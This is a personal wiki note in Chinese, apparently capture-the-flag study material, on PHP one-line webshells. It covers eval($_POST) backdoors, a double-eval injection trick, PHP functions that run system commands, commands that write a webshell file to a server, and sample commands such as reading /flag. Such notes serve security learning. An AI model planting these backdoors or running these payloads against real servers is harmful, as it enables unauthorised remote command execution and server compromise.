Content-Type: text/x-zim-wiki
Wiki-Format: zim 0.6
Creation-Date: 2024-11-22T18:17:17+08:00

====== webshell ======
Created 星期五 22 十一月 

一句话木马

php注入:
<?php eval($_POST['shell']); ?>
shell外是单双引号无所谓

eval($_POST['shell']);
eval("$_POST[shell]");
eval($_REQUEST['shell']);

双层eval：如果是$_GET['shell']，需要转换成post。且有的页面不能POST只能GET
eval($_GET['cmd']);  
1. ?cmd=''eval($_POST['shell']); ?shell=echo 123;''
等价于php执行=> eval('eval($_POST["shell"]);'); 或 eval('eval($_POST[\'shell\']);');
2. ?cmd=''eval("$_POST[shell]"); ?shell=echo 123;''
等价于php执行=> eval('eval("$_POST[shell]");');

细节考究（实际上用不到，因为对于外部输入来说，第一层eval一定是单引号）：
第一层eval是单引号：注意：内层要有分号
	eval('eval($_POST["shell"]);'); 
	eval('eval("$_POST[shell]");');  // 如果加了双引号，解析$，shell就不能再加引号了
第一层eval是双引号：注意因为会解析$，所以
	eval("eval(\$_POST['shell']);");  //要么转义\$
	eval("eval(\"$_POST[shell]\");");  //要么去掉shell的引号，并$_POST外套再一层双引号

其他替代函数：
assert(string):bool  用法同eval，8.0版本之前都有用

能执行系统指令的函数：
system(cmd):string|false 执行命令，输出执行结果，返回结果最后一行，失败返回false
	system('ls')
shell_exec(cmd): string|false|null 通过 shell 执行命令，返回完整输出
	echo shell_exec('ls')
撇号：`ls` 执行shell命令，返回完整输出，相当于shell_exec
	echo `ls`
exec(cmd, array output=null, result_code=null): string|false 执行一个外部程序，不输出结果，返回结果最后一行。当提供output参数时，会把每行输出添加到output里，返回值仍为最后一行。
	exec('ls', $out);
	echo $out;
passthru(cmd, result_code=null): ?false 执行外部程序并显示原始输出，成功返回null，失败返回false
	passthru('ls')
popen
proc_open
pcntl_exec
dl

[[bypass disable function被屏蔽的函数]]

注入webshell
system('echo \'<?php eval($_POST["shell"]);?>\' > shell.php');
shell_exec('echo "<?php eval(\$_POST[\'shell\']); ?>" > shell.php')
可以通过[[文件上传]] [[webshell]] 再 [[文件包含]] 注入webshell

测试指令/shell 指令：[[常用指令]]
shell=phpinfo();
shell=echo 123;
shell=system("ls /"); -> "bin dev etc flag home lib media mnt proc root run sbin srv sys tmp usr var"
shell=system("cat /flag");
system('whoami');
tac /file

shell指令bypass
. filename  ==  source filename  执行文件
